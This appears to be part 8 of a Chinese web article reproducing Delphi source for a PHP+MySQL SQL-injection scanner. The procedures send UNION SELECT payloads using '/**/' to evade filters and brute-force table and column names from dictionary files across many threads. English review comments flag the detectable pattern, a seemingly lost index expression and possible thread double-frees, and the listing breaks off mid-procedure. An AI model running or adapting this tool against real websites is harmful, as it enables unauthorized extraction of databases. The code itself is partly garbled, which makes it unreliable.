PHP+MYSQL网站注入扫描[8]

[入库:2005年8月18日] [更新:2007年3月24日]

本文简介：选自 lanyus 的 blog

end;
  except
  end;
finally
  idhttp.free;
end;
end;

// "Stop" button handler: hides the progress bar and raises the form-level
// stop flag (the flag itself is read elsewhere, outside this listing).
procedure tform1.sbstop1click(sender: tobject);
begin
  pg1.visible := false;
  stoped := true;
end;

//不使用线程
// Enumerates candidate table names for an already-confirmed injection point,
// issuing one HTTP request per dictionary entry on the UI thread (the
// "no thread" variant; sbscan1click does the same work in a worker thread).
// Relies on the form-level variables url, istr (the column list) and
// keyword (the string whose presence in a response counts as a hit).
procedure tform1.injtable;
var
i,j:integer;   // i: dictionary index; j: running count of hits shown in lvtable
begin
if (istr='') or (keyword='') then exit;
lsbdict.items.clear;
lvtable.items.clear;
// The dictionary is read from dict_table.txt next to the executable.
lsbdict.items.loadfromfile(extractfilepath(application.exename)+'dict_table.txt');
j:=0;
isfinish :=false;
screen.cursor :=crhourglass;
try
  for i:=0 to lsbdict.count-1 do
  begin
    if isfinish then break;   // isfinish is set from elsewhere to abort the loop
    // Every request carries the literal "/**/" sequence in place of
    // whitespace; it appears verbatim in the web server's access log, which
    // makes this traffic straightforward to alert on.
    // NOTE(review): "lsbdict.items" here and in subitems.add below reads as
    // if an index expression was lost when the page was extracted; treat this
    // listing as incomplete rather than as the author's code.
    injurl:=url+'/**/and/**/1=1/**/union/**/select/**/'+istr+
        '/**/from/**/'+lsbdict.items+'/*';

    mm.lines.add(injurl);   // echo the request into the log memo
    // get() is defined outside this listing; true means keyword was found
    // in the response.
    if get(injurl,keyword) then
    begin
    inc(j);
    with lvtable.items.add do
    begin
      caption :=inttostr(j);
      subitems.add(lsbdict.items
);
    end;
    end;
  end;
finally
  screen.cursor :=crdefault;   // always restore the cursor, even on exceptions
end;
end;

// "Scan tables" button: builds the column list "1,2,...,N" from edtfieldnum
// and starts a scantablethread (defined outside this listing) to do the
// table-name enumeration off the UI thread. keyword must already be set.
procedure tform1.sbscan1click(sender: tobject);
var
i:integer;
begin
// strtoint raises EConvertError on non-numeric input; nothing here catches it.
if (strtoint(edtfieldnum.text)<=0) or (keyword='') then exit;
lsbdict.items.clear;
lvtable.items.clear;
n :=0;   // n counts terminated worker threads (see fieldthreadexit)
lsbdict.items.loadfromfile(extractfilepath(application.exename)+'dict_table.txt');
isfinish :=false;
// istr is a form-level variable and is not cleared before this loop.
for i:=1 to strtoint(edtfieldnum.text) do
  istr:=istr+','+inttostr(i);
istr :=copy(istr,2,length(istr)-1);   // drop the leading comma
//the table-name guessing work is done inside a single thread
scantable :=scantablethread.create(url,istr,keyword,mm,lvtable);
end;

// "Scan fields" button. Requires a row selected in lvtable; the table name is
// taken from that row's sub-item. Behaviour depends on the form-level flag
// isfinish:
//   isfinish = false: reset the UI, load dict_field.txt, build the column
//     list with the placeholder &fieldname& in the position given by spnum,
//     and start one scanfieldthread per dictionary entry (fieldthreadexit
//     counts them back in).
//   isfinish = true: if the button caption reads '停止', suspend and free the
//     threads from index n onward and log the end of the run.
// isfinish is set to true unconditionally at the end of this handler, so the
// next click after a launch takes the stop branch; fieldthreadexit sets it
// back to false once every thread has terminated.
procedure tform1.sbscan2click(sender: tobject);
var
i,j,sum:integer;   // sum: number of dictionary entries, i.e. number of threads
tablename:string;
begin
if lvtable.items.count<=0 then exit;
if lvtable.selcount<=0 then
begin
  msgbox('请选择一个表名!');
  exit;
end;
tablename :=trim(lvtable.selected.subitems.gettext);
if tablename='' then exit;

if isfinish=false then
begin
  lsbdict.items.clear;
  lvfield.items.clear;
  mm.clear;
  n :=0;   // reset the finished-thread counter used by fieldthreadexit
  lsbdict.items.loadfromfile(extractfilepath(application.exename)+'dict_field.txt');
  sum :=lsbdict.count;
  istr :='';
    pg1.min :=0;
  pg1.max :=sum;   // progress bar advances once per finished thread
  pg1.step :=1;
  pg1.position :=0;
  pg1.visible :=true;
  mm.lines.add('开始猜解字段。。。');
  mm.lines.add('');
  // Column list "1,2,...,N" with the column selected in spnum replaced by the
  // &fieldname& placeholder — presumably substituted by the worker thread,
  // which is defined outside this listing; confirm there.
  for i:=1 to strtoint(edtfieldnum.text) do
  begin
    if i=strtoint(spnum.text) then
    istr :=istr+',&fieldname&'
    else istr :=istr+','+inttostr(i);
  end;
  if istr<>'' then
    istr :=copy(istr,2,length(istr)-1);   // drop the leading comma

  setlength(scanfield,sum);   // size the thread array dynamically: one thread per dictionary entry
  //create multiple threads to carry out the field guessing
  for j:=0 to sum-1 do
  begin
    //if isfinish then exit;
    scanfield[j] := scanfieldthread.create(url,istr,keyword,tablename,j,mm,lvfield);
    scanfield[j].onterminate := fieldthreadexit;
  end;
  // sbscan2.caption :='停止';
end;

try
  if isfinish=true then
  begin
    //if n>=lsbdict.count then exit;
    if sbscan2.caption='停止' then
    begin
    // Threads 0..n-1 have already reported in via fieldthreadexit; only the
    // remainder are stopped here.
    for j:=n to lsbdict.count-1 do
    begin
      // NOTE(review): a thread with FreeOnTerminate set frees itself when it
      // finishes; calling free here as well can double-free if that thread
      // has already terminated — confirm against the thread class.
      if scanfield[j].freeonterminate then
      begin
        scanfield[j].suspend;
        scanfield[j].free;
        //scanfield[j].terminate;
      end;
    end;
    end;
    mm.lines.add('');
    mm.lines.add('字段猜解结束。。。');
  // sbscan2.caption :='猜解';
  end;
except
  // errors while stopping threads are swallowed deliberately
end;

isfinish :=true;
end;

// OnTerminate handler shared by the field-enumeration worker threads:
// advances the progress bar, and once every thread has reported in,
// returns the form to its idle state.
procedure tform1.fieldthreadexit(sender: tobject);
begin
  pg1.stepit;
  inc(n);                           // n = number of threads finished so far
  if n <> lsbdict.count then exit;  // still waiting on the others
  // Last thread is done: clear the running flag and restore the idle UI.
  isfinish := false;
  pg1.visible := false;
  sbscan2.caption := '猜解';
  mm.lines.add('');
  mm.lines.add('字段猜解结束。。。');
end;

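// Click handler for the field list: the row captioned '1' fills the first
// field editor/spinner pair, any other selected row fills the second pair.
procedure tform1.lvfieldclick(sender: tobject);
begin
  // Clicking empty space leaves Selected nil; leave instead of dereferencing it.
  if lvfield.selected = nil then exit;
  if lvfield.selected.caption = '1' then
  begin
    // Deliberately reads items[0] rather than the selected row, as before.
    edtfield1.text := lvfield.items[0].subitems.gettext;
    spfield1.text := lvfield.items[0].caption;
  end
  else
  begin
    edtfield2.text := lvfield.selected.subitems.gettext;
    spfield2.text := lvfield.selected.caption;
  end;
end;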

procedure tform1.lvtableclick(sender: tobject);
begi
